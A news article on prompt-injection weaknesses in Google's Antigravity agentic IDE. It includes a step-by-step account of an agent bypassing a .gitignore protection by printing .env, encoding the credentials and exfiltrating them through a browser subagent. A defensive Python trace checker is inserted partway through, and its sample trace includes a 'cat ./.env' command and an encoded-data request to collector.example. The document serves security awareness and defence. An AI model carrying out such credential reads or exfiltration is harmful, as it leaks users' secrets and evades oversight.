Google’s AI-powered Antigravity IDE has troubling security issues

Google Antigravity IDE
  • Antigravity IDE allows agents to automatically execute commands under its default settings.
  • Prompt injection attacks can cause unwanted code execution in the IDE.
  • Data exfiltration is possible via Markdown, tool calls, or hidden instructions.

Google’s new Antigravity IDE has launched with an AI-powered, agent-centred design, but experts warn that it already has issues that fall short of basic security expectations.

A researcher at Instant Armor discovered that the system allows its agent to automatically execute commands when certain default settings are enabled, creating opportunities for unwanted behaviour.

If untrusted input appears in source files or other processed content, the agent can be manipulated to execute commands that the user never intended.

Risks associated with data access and exfiltration

The product allows the agent to perform tasks through the terminal, and while security measures have been put in place, there are still gaps in how these controls work.

These gaps create scope for prompt injection attacks, which can lead to unwanted code execution if the agent processes hidden or malicious input.

The same weakness applies to how Antigravity handles file access.

The agent has the ability to read and generate content, including files that may contain credentials or other sensitive project data.

Data exfiltration is possible when malicious instructions are hidden in Markdown, tool calls, or other text formats.

Attackers can use these channels to trick the agent into leaking internal files to locations controlled by the attacker.

Reports point to cloud logs and private code already collected during successful demonstrations, showing the seriousness of these vulnerabilities.

Google has acknowledged these issues and alerts users during onboarding. However, such warnings do not rule out the possibility that agents may operate without supervision.

Antigravity encourages users to accept recommended configurations that allow the agent to operate with minimal supervision.

This configuration hands decisions that call for human judgment over to the system, even in cases where terminal commands nominally require approval.

Users working with multiple agents through the Agent Management interface may not detect malicious behavior until the actions are completed.

This design assumes continuous user attention, even though the interface explicitly encourages background operation.

This can leave sensitive tasks running unchecked, with simple visual warnings that do nothing to change the underlying threat.

These decisions undermine the expectations normally associated with a modern firewall or similar protection.

Despite these restrictions, credential leaks can still occur. The IDE is intended to prevent direct access to files listed in .gitignore, including .env files that store sensitive variables.

However, the agent can get around this control by using terminal commands to print the contents of the file, bypassing the policy.

After collecting the data, the agent encodes the credentials, attaches them to a request for an attacker-monitored domain, and activates a browser subagent to complete the exfiltration.
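As an added illustration of the gap just described (not code from the article or from Google), here is a small policy check a defender could run over an agent's tool-call trace: it flags terminal commands that name gitignored files and browser navigations to non-allowlisted hosts or ones carrying a long opaque query string. The ignore patterns, host allowlist and sample trace are constructed assumptions for this example.

```python
import fnmatch
import re
import shlex
from urllib.parse import urlparse

# Constructed policy inputs (assumptions for this example, not Antigravity's real config):
# patterns a project might list in .gitignore, and hosts the browser subagent may visit.
IGNORED_PATTERNS = [".env", ".env.*", "*.pem", "secrets/*"]
ALLOWED_BROWSER_HOSTS = {"docs.python.org", "github.com"}

def is_ignored_path(path):
    """True if a path (or its basename) matches an ignore pattern."""
    clean = re.sub(r"^(\./)+", "", path)      # drop leading ./ without touching the dotfile
    base = clean.rsplit("/", 1)[-1]
    return any(fnmatch.fnmatch(clean, p) or fnmatch.fnmatch(base, p) for p in IGNORED_PATTERNS)

def check_terminal_command(command):
    """Flag shell commands whose arguments name ignored files (e.g. `cat .env`)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return ["unparseable command: %r" % command]
    return ["ignored file referenced: %s" % t for t in tokens if is_ignored_path(t)]

def check_browser_navigation(url):
    """Flag navigations off the allowlist or carrying a long opaque query string."""
    parsed = urlparse(url)
    findings = []
    host = parsed.hostname or ""
    if host not in ALLOWED_BROWSER_HOSTS:
        findings.append("host not allowlisted: %s" % host)
    if len(parsed.query) > 64 and re.fullmatch(r"[A-Za-z0-9+/=%._-]+", parsed.query):
        findings.append("long opaque query string (%d chars)" % len(parsed.query))
    return findings

def review_trace(trace):
    """Return {step_index: findings} for every flagged step in an agent trace."""
    checks = {"terminal": check_terminal_command, "browser": check_browser_navigation}
    flagged = {}
    for i, (tool, arg) in enumerate(trace):
        findings = checks.get(tool, lambda _arg: [])(arg)
        if findings:
            flagged[i] = findings
    return flagged

# Constructed trace mirroring the read-then-exfiltrate sequence described above.
SAMPLE_TRACE = [
    ("terminal", "cat ./.env"),
    ("terminal", "ls src"),
    ("browser", "https://docs.python.org/3/"),
    ("browser", "https://collector.example/?d=" + "QUJDREVG" * 10),
]
```

Running `review_trace(SAMPLE_TRACE)` flags steps 0 and 3 only; a real deployment would apply such checks before the tool call executes, not after.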

The process happens quickly and is rarely visible unless the user is actively observing the agent’s actions, which is unlikely when multiple tasks are running in parallel.

These issues highlight the risks that arise when AI tools are given broad autonomy without adequate structural safeguards.

The design favours convenience, but the current configuration gives attackers a significant advantage until more robust defences are implemented.